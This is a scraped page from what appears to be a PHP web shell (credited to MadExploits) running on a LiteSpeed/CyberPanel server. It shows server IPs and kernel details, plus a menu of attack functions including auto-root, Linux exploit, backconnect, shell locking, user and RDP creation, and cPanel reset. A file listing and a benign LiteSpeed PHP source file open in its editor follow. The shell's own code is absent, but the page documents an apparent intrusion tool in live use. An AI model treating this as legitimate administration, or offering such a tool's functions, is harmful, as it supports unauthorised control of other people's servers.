Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.open /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
ows
[ DIR ]
drwxr-xr-x
util
[ DIR ]
drwxr-xr-x
CAuthorizer.php
9.56
KB
-rw-r--r--
CData.php
36.55
KB
-rw-r--r--
CNode.php
21.42
KB
-rw-r--r--
CValidation.php
21.7
KB
-rw-r--r--
ControllerBase.php
15.46
KB
-rw-r--r--
DAttrBase.php
12.63
KB
-rw-r--r--
DAttrHelp.php
2.05
KB
-rw-r--r--
DInfo.php
16.55
KB
-rw-r--r--
DKeywordAlias.php
1.49
KB
-rw-r--r--
DMsg.php
8.01
KB
-rw-r--r--
DPage.php
3.62
KB
-rw-r--r--
DTbl.php
19.03
KB
-rw-r--r--
DTblDefBase.php
64.83
KB
-rw-r--r--
DTblMap.php
5.29
KB
-rw-r--r--
LogViewer.php
7.64
KB
-rw-r--r--
PathTool.php
4.63
KB
-rw-r--r--
PlainConfParser.php
9.46
KB
-rw-r--r--
SInfo.php
7.28
KB
-rw-r--r--
XmlParser.php
2.45
KB
-rw-r--r--
blowfish.php
25.68
KB
-rw-r--r--
jCryption.php
19.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DPage.php
<?php class DPage { private $_id; private $_label; private $_tblmap; private $_printdone; private $_disp_tid; private $_disp_ref; private $_extended; private $_linked_tbls; public function __construct($id, $label, $tblmap) { $this->_id = $id; $this->_label = $label; $this->_tblmap = $tblmap; } public function GetID() { return $this->_id; } public function GetLabel() { return $this->_label; } public function GetTblMap() { return $this->_tblmap; } public function PrintHtml($disp) { $this->_disp_tid = $disp->Get(DInfo::FLD_TID); $this->_disp_ref = $disp->Get(DInfo::FLD_REF); $this->_linked_tbls = null; $this->_extended = true; if ($this->_disp_tid == '') { $this->_extended = false; } elseif ($this->_disp_tid && ($last = strrpos($this->_disp_tid, '`')) > 0) { $this->_disp_tid = substr($this->_disp_tid, $last + 1); } if (($topmesg = $disp->Get(DInfo::FLD_TopMsg)) != null) { foreach ($topmesg as $tm) { echo UIBase::message('', $tm, 'error'); } } $root = $disp->Get(DInfo::FLD_PgData); if ($root == null) return; if ($root->Get(CNode::FLD_KEY) == CNode::K_EXTRACTED) { $this->print_tbl($this->_disp_tid, $root, $disp); } else { $this->_printdone = false; $this->print_map($this->_tblmap, $root, $disp); } if ($disp->IsViewAction() && $this->_linked_tbls != null) { $this->_extended = true; $disp->SetPrintingLinked(true); foreach ($this->_linked_tbls as $lti) { $this->_disp_tid = $lti; $this->_disp_ref = $disp->Get(DInfo::FLD_REF); $this->_printdone = false; $this->print_map($this->_tblmap, $root, $disp); } $disp->SetPrintingLinked(false); } } private function print_map($tblmap, $node, $disp) { $dlayer = ($node == null) ? null : $node->LocateLayer($tblmap->GetLoc()); $maps = $tblmap->GetMaps($this->_extended); foreach ($maps as $m) { if (is_a($m, 'DTblMap')) { if (is_array($dlayer)) { $ref = $this->_disp_ref; if (($first = strpos($ref, '`')) > 0) { $this->_disp_ref = substr($ref, $first + 1); $ref = substr($ref, 0, $first); } else { $this->_disp_ref = ''; } $dlayer = $dlayer[$ref]; } $this->print_map($m, $dlayer, $disp); if ($this->_printdone) break; } else { if ($m != null && ($this->_disp_tid == '' || $this->_disp_tid == $m)) { $this->print_tbl($m, $dlayer, $disp); if ($this->_disp_tid == $m) { $this->_printdone = true; break; } } } } } private function print_tbl($tid, $dlayer, $disp) { $tbl = DTblDef::getInstance()->GetTblDef($tid); $tbl->PrintHtml($dlayer, $disp); if (($linked = $tbl->Get(DTbl::FLD_LINKEDTBL)) != null) { if ($this->_linked_tbls == null) $this->_linked_tbls = $linked; else $this->_linked_tbls = array_merge($this->_linked_tbls, $linked); } } }
Close